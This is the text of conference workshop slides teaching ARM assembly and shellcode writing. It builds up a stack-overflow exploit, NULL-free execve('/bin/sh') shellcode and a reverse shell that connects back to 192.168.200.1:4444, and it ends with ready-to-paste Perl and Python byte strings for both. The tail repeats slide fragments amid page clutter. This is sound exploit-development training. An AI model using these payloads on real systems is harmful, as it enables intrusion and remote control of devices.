ARM Shellcode Workshop 44con2017

WRITING ARM SHELLCODE
SAUMIL SHAH @therealsaumil

THE ARM EXPLOIT LABORATORY
44CON 2017
NETSQUARE 44CON 2017 (c) SAUMIL SHAH

Saumil Shah
CEO Net-square.
Hacker, Speaker, Trainer,
Author.
M.S. Computer Science
Purdue University.
LinkedIn: saumilshah
Twitter: @therealsaumil

Azeria
Hacker
Oensive Security
Reverse Engineering
Malware Research
ARM Tutorials
Azeria-Labs
Twitter: @Fox0x01

There is an Intel on
every desktop,
but an ARM in
every pocket.

ARM CPU Features
RISC CPU
Load/Store architecture.
32bit ARM mode / 16bit Thumb mode.
Conditional Execution (ARM mode only).
Inline Barrel Shifter.
Fully aligned memory access.
Bi-Endian (Data).

ARM CPU Registers
R0 Accumulator R8
R1 R9
R2 R10
R3 R11 FP Frame Pointer (if used)
R4 R12 IP Intra Procedural Call scratch register
R5 R13 SP Stack Pointer
R6 R14 LR Link Register
R7 Syscall Number R15 PC Program Counter
CPSR Current Program Status Register

CPSR
31 30 29 28 27 24 9 8 7 6 5 4 0
N Z C V Q J GE E A I F T M
privilege mode
Abort disable
Endianness
IRQ disable
FIQ disable
Greater 10000 = User
underow
oVerow
Negative
Thumb
Jazelle
than or 11111 = System

Carry
Zero
10011 = SVC
Equal for
10001 = FIQ
SIMD 10010 = IRQ
10111 = Abort
11011 = Undened
cpsr = 0x??????30 = user, thumb

cpsr = 0x??????10 = user, arm

ARM Instructions
Fixed length instructions.

ARM Instructions 4 bytes.
Thumb Instructions 2 bytes.
Every instruction can be made
CONDITIONAL.
Inline Barrel Shifter available to all
registers.
Few instructions, many combinations.

Thumb Instructions
A subset of ARM instructions.

Popular ARM instructions are also
available as Thumb instructions.
Increase code density.
twice the number of instructions per KB as
compared to ARM instructions.
Restrictions on operands.

ARM Instructions
UAL Unied Assembly Language

mixed ARM and Thumb code
Instruction format:
[instr][cond][s] [dest], [src], [other operand..]
mov r0, #5 r0 = 5
addgt r2, r1, #3 if greater than, r2 = r1 + 3
movs r1, r2 r1 = r2, update CPSR
ARM Assembler Conventions
#N decimal integer
0xN hexadecimal integer
0bN binary integer
.code 32 ARM code

.code 16 Thumb code

Popular ARM instructions
MOV Move data LDR Load
MVN Move 2's complement STR Store
ADD Addition LDM Load Multiple
SUB Subtraction STM Store Multiple
MUL Multiplication PUSH Push on stack
LSL Logical Shift Left POP Pop o stack
LSR Logical Shift Right B Branch
ASR Arithmetic Shift Right BL Branch with link
ROR Rotate Right BX Branch and exchange
CMP Compare BLX Branch with link and exchange
AND Bitwise AND SWI/SVC System Call
ORR Bitwise OR
EOR Bitwise XOR
Structure of an Assembly Program
program.s Assembly and Linking
.section .text as program.s o program.o
.global _start ld program.o o program (ELF)
_start:
.code 32
// code goes here Inspecting the assembled code
bkpt
objdump d program.o
Executing under GDB

gdb program
gef> break _start

gef> run

first.s your first ARM code
.section .text A few GDB commands
.global _start
break Set breakpoint
_start: run [args] Start a program from
.code 32 the beginning
mov r0, #2
add r1, r0, r0 continue Resume execution after
bkpt a breakpoint
stepi / si Single Step an
To assemble: instruction
as first.s o first.o info registers Show all registers
ld first.o o first
x/20xw $sp Examine 20 DWORDS in
Run using GDB hexadecimal format
from the Stack Pointer
gdb first x/10i $pc Examine 10
disassembled
gef> break _start
instructions from the
gef> run
Program Counter
first.s GDB/GEF
gef> run
-------------------------------------------------------------------[registers]--
$r0 0x00000000 $r1 0x00000000 $r2 0x00000000 $r3 0x00000000
$r4 0x00000000 $r5 0x00000000 $r6 0x00000000 $r7 0x00000000
$r8 0x00000000 $r9 0x00000000 $r10 0x00000000 $r11 0x00000000
$r12 0x00000000 $sp 0xbefff7f0 $lr 0x00000000 $pc 0x00008054
$cpsr 0x00000010
Flags: [ thumb fast interrupt overflow carry zero negative ]
-----------------------------------------------------------------------[stack]--
0xbefff7f0|+0x00: 0x1 <- $sp
0xbefff7f4|+0x04: 0xbefff8f0 -> "/home/pi/asm/first"
0xbefff7f8|+0x08: 0x0
0xbefff7fc|+0x0c: 0xbefff903 -> "SHELL=/bin/bash"
0xbefff800|+0x10: 0xbefff913 -> "TERM=xterm"
--------------------------------------------------------------------[code:arm]
0x8054 <_start> mov r0, #2 <- $pc
0x8058 <_start+4> add r1, r0, r0
0x805c <_start+8> bkpt 0x0000
-----------------------------------------------------------------------[trace]--
#0 0x00008054 in _start ()
Breakpoint 1, 0x00008054 in _start ()

first.s GDB/GEF
gef> continue
Program received signal SIGBUS, Bus error.

-------------------------------------------------------------------[registers]--
$r0 0x00000002 $r1 0x00000004 $r2 0x00000000 $r3 0x00000000
$r4 0x00000000 $r5 0x00000000 $r6 0x00000000 $r7 0x00000000
$r8 0x00000000 $r9 0x00000000 $r10 0x00000000 $r11 0x00000000
$r12 0x00000000 $sp 0xbefff7f0 $lr 0x00000000 $pc 0x0000805c
$cpsr 0x00000010
Flags: [ thumb fast interrupt overflow carry zero negative ]
-----------------------------------------------------------------------[stack]--
0xbefff7f0|+0x00: 0x1 <- $sp
0xbefff7f4|+0x04: 0xbefff8f0 -> "/home/pi/asm/first"
0xbefff7f8|+0x08: 0x0
0xbefff7fc|+0x0c: 0xbefff903 -> "SHELL=/bin/bash"
0xbefff800|+0x10: 0xbefff913 -> "TERM=xterm"
--------------------------------------------------------------------[code:arm]
0x8054 <_start> mov r0, #2
0x8058 <_start+4> add r1, r0, r0
0x805c <_start+8> bkpt 0x0000 <- $pc
0x8060 andeq r1, r0, r1, asr #10
0x8064 cmnvs r5, r0, lsl #2
-----------------------------------------------------------------------[trace]--
#0 0x0000805c in _start ()
0x0000805c in _start ()

Arithmetic/Logical Instructions
Instruction Operation
add r0, r1, r2 r0 = r1 + r2 Add
sub r0, r1, r2 r0 = r1 r2 Subtract
mul r0, r1, r2 r0 = r1 * r2 Multiply
and r0, r1, r2 r0 = r1 & r2 Bitwise AND
orr r0, r1, r2 r0 = r1 | r2 Bitwise OR
eor r0, r1, r2 r0 = r1 ^ r2 Bitwise XOR
mvn r0, r1 r0 = !r1 NOT (Move Negative)

Branches
Can be used to switch to Thumb mode

and vice versa.
Branch with Exchange
Can save the value of PC into LR before
branching.
Branch with Link

Branches
b offset pc = pc + oset Branch
bx Rm pc = Rm Branch and Exchange
LSB(pc) = 1: Thumb Mode
LSB(pc) = 0: ARM Mode
bl offset lr = pc Branch and Link
pc = pc + oset
blx Rm lr = pc Branch, Link and Exchange
pc = Rm
LSB(pc) = 1: Thumb Mode
LSB(pc) = 0: ARM Mode

Load/Store Instructions
ldr r0, [r1] r0 = [r1]
ldr r0, [r1, #4] r0 = [r1 + 4]
ldr r0, [r1, r2] r0 = [r1 + r2]
str r0, [r1] [r1] = r0
str r0, [r1, #4] [r1 + 4] = r0
str r0, [r1, r2] [r1 + r2] = r0
ldrb / strb Load / Store single byte
ldrh / strh Load / Store half-word (2 bytes)

Load Immediate - limitations
ARM instructions are 4 bytes wide.

This includes OPCODE + OPERANDS.
How do we load a 32 bit value into a 32
bit register?
e.g. r0 = 0x41424344
mov r0, 0x41424344 won't work.
opcode operand
32 bits

PC Relative Addressing
For Immediate values larger than what

can be contained in a single instuction...
...the assembler places them in a
LITERAL POOL.
Literal Pool = part of code region set
aside for storing literals/constants.
Literal Pool is accessed using a relative
oset from the current program
counter.
PC Relative Addressing
current instruction
address + 8 = 0x8108
0x8100 ldr r0, [pc, #12] r0 = [0x8108 + 12] = [0x8114]
0x8104 add r1, pc, #12
0x8108 ...
0x810c ...
0x8110 ...
0x8114 0x41414141 literal

pool
0x8118 0x42424242

PC Relative Addressing - MUSTs
Literal Pools MUST BE 4 byte aligned.

PC Relative osets MUST BE multiples of
4 bytes. (even in THUMB mode).
:
8: a003 add r0, pc, #12 Oset is a multiple of 4 bytes
a: 4052 eors r2, r2
c: 71c2 strb r2, [r0, #7]
e: b405 push {r0, r2}
10: 4669 mov r1, sp
12: 270b mov r7, #11
14: df01 svc #1
16: 46c0 mov r8, r8 (nop) Extra "NOP" for alignment padding
18: .word 0x6e69622f Literal pool is 4 byte aligned
1c: .word 0x5868732f
:

Invoking System Calls
Intel x86
PUSH parameters on the stack
MOV EAX, syscall_number
SYSENTER / INT 80
ARM
r0, r1, ..., r6 parameters loaded in registers
MOV r7, syscall_number
SVC #0
Return value in r0
Example: write()
write(fd, *buf, count)

fd = 1 for STDOUT
buf = pointer to string
count = number of bytes to write
syscall number 0x4
mov r0, #1 // fd 1 = STDOUT
ldr r1, string
mov r2, #10 // Write 10 bytes to STDOUT
mov r7, #4 // Syscall 0x4 = write()
svc #0

Basic Toolkit
objdump - multipurpose utility

strace - syscall trace
gcc - compiler
as - assembler
ld - linker
objcopy - ELF to RAW
gdb - debugger
gef - Make GDB Great Again
Spot the Bug!
victim1.c
int main(int argc, char *argv[])
{
if(argc > 1)
func1(argv[1]);
}
void func1(char *s)

{
char buffer[128];
What happens
strcpy(buffer, s); if s > 128 bytes?
}

SEGMENTATION FAULT
CORE DUMPED

victim1.c the crash
pc = 0x41414140
A A A A A A A A A A ... A A A A A A A A A A AAAA A A A A A A ...
sp

Real Shellcode - Goals
Self contained code.

No absolute addresses.
Be independent of the process being
executed/attacked.
Avoid library calls.
All OS services accessed via syscalls.
Compact.
Free of NULL bytes.
Shellcode alignment with sp
binary / library
bx sp
A A A A A A A A A A ... A A A A A A A A A A pc SHELLCODE...
sp
Better placement for shellcode.

Need to locate a proper branch
instruction to sp. (bx or blx)

Placeholder Shellcode
Intel x86 INT3 instruction

opcode 0xCC.
ARM BKPT instruction (4 bytes)
opcode 0xe1200070. NULL byte problem.
bkpt 0xf opcode 0xe1207f.
bkpt ignores the operand.
Thumb - BKPT instruction (2 bytes)
bkpt 0x opcode 0xbe

ARM or Thumb?
Thumb instructions are always

preferred over ARM instructions.
Greater probability of nding 2 byte
sequences.
Thumb keeps shellcode compact.
Also easier to avoid NULL bytes.

Returning to "bx sp"
0xb6e9c000 libc-2.13.so
+ 0x5530 T bx sp 0xb6ea1530 (Thumb)
How does the CPU know which mode to switch into?

Switching between ARM/Thumb
BX / BLX instructions, depending upon

the operand.
PC with LSB = 1 forces Thumb mode.
PC with LSB = 0 forces ARM mode.

Returning to Thumb "bx sp"
0xb6e9c000 libc-2.13.so
+ 0x5530 T bx sp 0xb6ea1530 (Thumb)
Set return address = libc_base + oset + 1 (force Thumb)
0xb6ea1531

Shellcode alignment with sp
libc
bx sp
switch to Thumb mode
switch back to ARM mode

since data is 4 byte aligned,
pc and sp will have LSB = 0
A A A A A A A A A ... A A A A A A A A A A b6ea1531 SHELLCODE
sp
Deliberately forcing a return-to-thumb

"bx sp" instruction by setting PC LSB = 1

ARM EXEC "/bin/sh"
system("/bin/sh")
execve("/bin/sh", argv, envp)
r0 "/bin/sh"
syscall 11
r1 0 (NULL)
r2 0 (NULL)
r7 11 (syscall number)
svc #0

execve()
execve(*lename, *argv[], *envp[])

Simplication
argv = NULL
envp = NULL
execve(*lename, 0, 0)

exec_arm.s
.section .text $ objdump -d exec_arm.o
.global _start
_start: 00000000 <_start>:
add r0, pc, #12 0: e28f000c add r0, pc, #12
mov r1, #0 4: e3a01000 mov r1, #0
mov r2, #0 8: e3a02000 mov r2, #0
c: e3a0700b mov r7, #11
mov r7, #11 10: ef000000 svc 0x00000000
svc #0 14: 6e69622f .word 0x6e69622f
18: 0068732f .word 0x0068732f
.ascii "/bin/sh\0"
Too many NULL bytes in the shellcode.

De-NULLifying ARM shellcode
Force a switch to Thumb mode.

2 byte instructions are easier to de-nullify
Replace operations that involve 0 with
other equivalent operations.
a=0 OR
a=aa
"svc #1" works just as well as "svc #0"!

exec_thumb.s
switch to
.section .text Thumb mode: $ objdump -d exec_thumb.o
.global _start branch pc + 1
_start: 00000000 <_start>:
.code 32 0: e28f3001 add r3, pc, #1
add r3, pc, #1 4: e12fff13 bx r3
bx r3 8: a002 add r0, pc, #8
a: 1a49 subs r1, r1, r1
.code 16 c: 1c0a adds r2, r1, #0
add r0, pc, #8 e: 270b movs r7, #11
sub r1, r1, r1 10: df01 svc 1
mov r2, r1 12: 1c2d adds r5, r5, #0
mov r7, #11 14: 6e69622f .word 0x6e69622f
svc #1 18: 0068732f .word 0x0068732f
mov r5, r5
must be 4 byte
.ascii "/bin/sh\0" aligned for data
(add a "NOP")
Only 1 NULL remains, in the data.

r0

"Place anywhere" shellcode
End the data string with "/bin/shX".

Force a NULL byte to be written at the
last character.
strb Rx, [Ry, #oset]
writes value of Rx to address [Ry + oset]
For self-modifying shellcode, link with -N
as exec_final.s -o exec_final.o
ld -N exec_final.o -o exec_final

exec_final.s
switch to
.section .text Thumb mode:
.global _start branch pc + 1
_start:
.code 32
add r3, pc, #1
bx r3
.code 16
add r0, pc, #8
sub r1, r1, r1
mov r2, r1
strb r2, [r0, #7]
mov r7, #11
svc #1
write a NULL
.ascii "/bin/shX" byte at the end
of "/bin/shX"
r0

Generating Binary Shellcode
1. Assemble the as shellcode.s o shellcode.o
shellcode
2. Link as RWX ELF ld -N shellcode.o o shellcode.elf
binary
3. Extract RAW objcopy O binary shellcode.elf
shellcode.bin
assembly
4. Derive a hex hexdump v e '"\\" 1/1 "x%02x"'
shellcode.bin
encoded string -OR-
./hex_encode.pl shellcode.bin

Reverse Shell
connect
nc l p 4444 socket
1 - STDOUT
2 - STDERR
0 STDIN
execve
"/bin/sh"
listener

Reverse Shell in C
int sockfd;
struct sockaddr_in addr;
addr.sin_family = AF_INET; // TCP/IP socket(00 02)

addr.sin_port = 0x5c11; // 4444
addr.sin_addr.s_addr = 0x01c8a8c0; // 192.168.200.1
// C0 A8 C8 01
sockfd = socket(AF_INET, SOCK_STREAM, 0); // r0 = socket(2, 1, 0)

connect(sockfd, &addr, sizeof(addr)); // connect(sockfd,
// &addr, 16)
dup2(sockfd, 2); // STDERR --> sockfd

dup2(sockfd, 1); // STDOUT --> sockfd
dup2(sockfd, 0); // STDIN --> sockfd
execve("/bin/sh", 0, 0);

Hand Assembling Reverse Shell
sd = socket(2, 1, 0)
connect(sd, &addr, 16)
addr: "\x02\x00\xPP\xPP\xAA\xAA\xAA\xAA"
Protocol Port IP Address (big endian)
"\x02\x00\x11\x5c\xc0\xa8\xc8\x01"
4444 192.168.200.1
dup2(sd, 0)
dup2(sd, 1)
dup2(sd, 2)
execve("/bin/sh", 0, 0)
need to save return value of socket() call

sd (socket descriptor)
All return values in r0
Syscall numbers
Syscall invocation in ARM

r0-r6 = parameters
r7 = syscall number
svc #1 (to avoid NULL byte)
Syscall numbers: /usr/include/arm-linux-gnueabihf/asm/unistd.h

#define __NR_socket (__NR_SYSCALL_BASE+281)
#define __NR_connect (__NR_SYSCALL_BASE+283)
#define __NR_dup2 (__NR_SYSCALL_BASE+ 63)
#define __NR_execve (__NR_SYSCALL_BASE+ 11)

Reverse Shell no NULL bytes
ARM/THUMB switch
socket (281) s = socket(AF_INET, SOCK_STREAM, 0)
Write '\0' at [data + 1] strb Rx, [Ry, #1] Rx = 0, Ry = data
Write '\0' at [data + 15] strb Rx, [Ry, #15] Rx = 0, Ry = data
connect (283) connect(s, &sockaddr, 16)
dup2 (63) dup2(s, 0) STDIN
dup2 (63) dup2(s, 1) STDOUT
dup2 (63) dup2(s, 2) STDERR
execve (11) execve("/bin/sh", 0, 0)
02 XX LPORT data: sockaddr

LHOST IP Address
/bin/shX data: path to shell
Reverse Shell syscall sequence
syscall r0 r1 r2 r7 Return Value

socket 2 1 0 281 sd
connect sd sockaddr 16 283 0 = success
dup2 sd 2 (stderr) - 63 2
dup2 sd 1 (stdout) - 63 1
dup2 sd 0 (stdin) - 63 0
execve "/bin/sh" 0 0 11 0 = success

Cheat Sheets binutils
How Do I... Commands
Assemble a program as program.s o program.o;
ld program.o o program
Disassemble a program objdump d program.o
objdump d program
Forced Disassembly objdump b binary D marm <file>
(for ROP gadgets) objdump b binary D marm
Mforce-thumb <file>
Generate an ELF as program.s o program.o;
executable with ld N program.o o program
RW .text section
Extract RAW assembly objcopy O binary <ELFfile> <binfile>
from an ELF executable
(for shellcode)

Cheat Sheets gdb 1
Commands What they do
break _start Set Breakpoint at label or address.
break main
break *0x8054
run Run a program being debugged, with optional
run "HELLO" command line arguments.
run "$EGG"
continue Resume execution after a halting at a breakpoint.
stepi Step Into an instruction. Optional argument
stepi 5 indicates how many instrutions to step.
nexti Step Over an instruction. Optional argument
nexti 5 indicates how many instrutions to step.
info registers Show contents of registers.
info proc map Show process memory map.
maintenance info Show all the sections of the target ELF binary.
sections
Cheat Sheets gdb 2
Commands What they do
x Examine Memory
x/32xw $sp Examine 32 DWORDS (w) or Bytes (b) of memory
x/32xb $sp beginning from SP.
x/10i $pc Examine 10 INSTRUCTIONS beginning from PC.
x/s 0x10094 Examine a NULL terminated string at address
0x10094.
x/s &string Examine a NULL terminated string at address
specied by the label "string".
print <expr> Evaluate an expression and print it.
print $r0 Display value of r0.
print system Display the address of system().
disassemble <label> Display the disassembled code from label.

Cheat Sheets gdb 3
Searching memory The "nd" command
nd [/b|/w] [/count] <start address>,<+len>,<val1>,<val2>,...
nd [/b|/w] [/count] <start address>,<end address>,<val1>,<val2>,...
nd /b 0x40021000,+0x1000,0x41,0x42 Search "AA" for next 0x1000
bytes beginning from
0x40021000
nd /w /10 0x08048000,0x08049f,0x7 Search 10 instances of
integer 0x00000007 from
0x08048000 to 0x08049f

Cheat Sheets gef
Command What it does
xfiles Dumps all sections of all the loaded ELF images in
the process memory.
vmmap Better version of info proc map. Shows RWX
attributes in mapped pages.
xinfo Memory attributes at a given address. Equivalent
to the !vprot command in WinDBG.
checksec Inspect compiler level protection built into the
running binary.

execve() Shellcode
# Perl - execve("/bin/sh", ["/bin/sh", 0], 0)
$shellcode = "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x03\xa0\x92\x1a
\xc2\x71\x05\xb4\x69\x46\x0b\x27\x01\xdf\xc0\x46/bin/shX";
# Python - execve("/bin/sh", ["/bin/sh", 0], 0)
shellcode = "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x03\xa0\x92\x1a
\xc2\x71\x05\xb4\x69\x46\x0b\x27\x01\xdf\xc0\x46/bin/shX"

Reverse Shell Shellcode
# Perl connect back to 192.168.200.1:4444
$shellcode = "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\x20\x01\x21
\x92\x1a\xc8\x27\x51\x37\x01\xdf\x04\x1c\x0b\xa1\x4a\x70\xca\x73
\x10\x22\x02\x37\x01\xdf\x3f\x27\x20\x1c\x49\x1a\x01\xdf\x20\x1c
\x01\x31\x01\xdf\x20\x1c\x01\x31\x01\xdf\x05\xa0\x52\x40\x05\xb4
\x69\x46\x0b\x27\x01\xdf\xc0\x46\x02\xff" . pack("n", 4444) .
chr(192) . chr(168) . chr(200) . chr(1) . "/bin/shX";
# Python connect back to 192.168.200.1:4444
from struct import *
shellcode = "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\x20\x01\x21
\x92\x1a\xc8\x27\x51\x37\x01\xdf\x04\x1c\x0b\xa1\x4a\x70\xca\x73
\x10\x22\x02\x37\x01\xdf\x3f\x27\x20\x1c\x49\x1a\x01\xdf\x20\x1c
\x01\x31\x01\xdf\x20\x1c\x01\x31\x01\xdf\x05\xa0\x52\x40\x05\xb4
\x69\x46\x0b\x27\x01\xdf\xc0\x46\x02\xff" + pack(">H", 4444) +
chr(192) + chr(168) + chr(200) + chr(1) + "/bin/shX"

THE EXPLOIT LABORATORY
Contact us: Follow @therealsaumil for:
Saumil Shah updates

@therealsaumil new classes
saumil@net-square.com on-site training
LinkedIn: saumilshah announcements
Blog:
http://blog.exploitlab.net

ARM Shellcode Workshop 44con2017

Uploaded by

Document Information

Original Description:

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

ARM Shellcode Workshop 44con2017

Uploaded by

Copyright:

Available Formats

WRITING ARM SHELLCODE

SAUMIL SHAH @therealsaumil

NETSQUARE 44CON 2017 (c) SAUMIL SHAH

NETSQUARE 44CON 2017 (c) SAUMIL SHAH

NETSQUARE 44CON 2017 (c) SAUMIL SHAH

NETSQUARE 44CON 2017 (c) SAUMIL SHAH

NETSQUARE 44CON 2017 (c) SAUMIL SHAH

NETSQUARE 44CON 2017 (c) SAUMIL SHAH

than or 11111 = System

cpsr = 0x??????30 = user, thumb

NETSQUARE 44CON 2017 (c) SAUMIL SHAH

Fixed length instructions.

NETSQUARE 44CON 2017 (c) SAUMIL SHAH

A subset of ARM instructions.

NETSQUARE 44CON 2017 (c) SAUMIL SHAH

UAL Unied Assembly Language

[instr][cond][s] [dest], [src], [other operand..]

.code 32 ARM code

NETSQUARE 44CON 2017 (c) SAUMIL SHAH

Executing under GDB

gef> break _start

NETSQUARE 44CON 2017 (c) SAUMIL SHAH

Breakpoint 1, 0x00008054 in _start ()

NETSQUARE 44CON 2017 (c) SAUMIL SHAH

Program received signal SIGBUS, Bus error.

NETSQUARE 44CON 2017 (c) SAUMIL SHAH

NETSQUARE 44CON 2017 (c) SAUMIL SHAH

Can be used to switch to Thumb mode

NETSQUARE 44CON 2017 (c) SAUMIL SHAH

NETSQUARE 44CON 2017 (c) SAUMIL SHAH

NETSQUARE 44CON 2017 (c) SAUMIL SHAH

ARM instructions are 4 bytes wide.

NETSQUARE 44CON 2017 (c) SAUMIL SHAH

For Immediate values larger than what

0x8100 ldr r0, [pc, #12] r0 = [0x8108 + 12] = [0x8114]

0x8104 add r1, pc, #12

0x8114 0x41414141 literal

NETSQUARE 44CON 2017 (c) SAUMIL SHAH

Literal Pools MUST BE 4 byte aligned.

NETSQUARE 44CON 2017 (c) SAUMIL SHAH

write(fd, *buf, count)

NETSQUARE 44CON 2017 (c) SAUMIL SHAH

objdump - multipurpose utility

void func1(char *s)

NETSQUARE 44CON 2017 (c) SAUMIL SHAH

NETSQUARE 44CON 2017 (c) SAUMIL SHAH

A A A A A A A A A A ... A A A A A A A A A A AAAA A A A A A A ...

NETSQUARE 44CON 2017 (c) SAUMIL SHAH

Self contained code.

Better placement for shellcode.

NETSQUARE 44CON 2017 (c) SAUMIL SHAH

Intel x86 INT3 instruction

NETSQUARE 44CON 2017 (c) SAUMIL SHAH

Thumb instructions are always

NETSQUARE 44CON 2017 (c) SAUMIL SHAH

+ 0x5530 T bx sp 0xb6ea1530 (Thumb)

How does the CPU know which mode to switch into?

NETSQUARE 44CON 2017 (c) SAUMIL SHAH

BX / BLX instructions, depending upon

NETSQUARE 44CON 2017 (c) SAUMIL SHAH

+ 0x5530 T bx sp 0xb6ea1530 (Thumb)

Set return address = libc_base + oset + 1 (force Thumb)

NETSQUARE 44CON 2017 (c) SAUMIL SHAH

execve(lename, argv[], *envp[])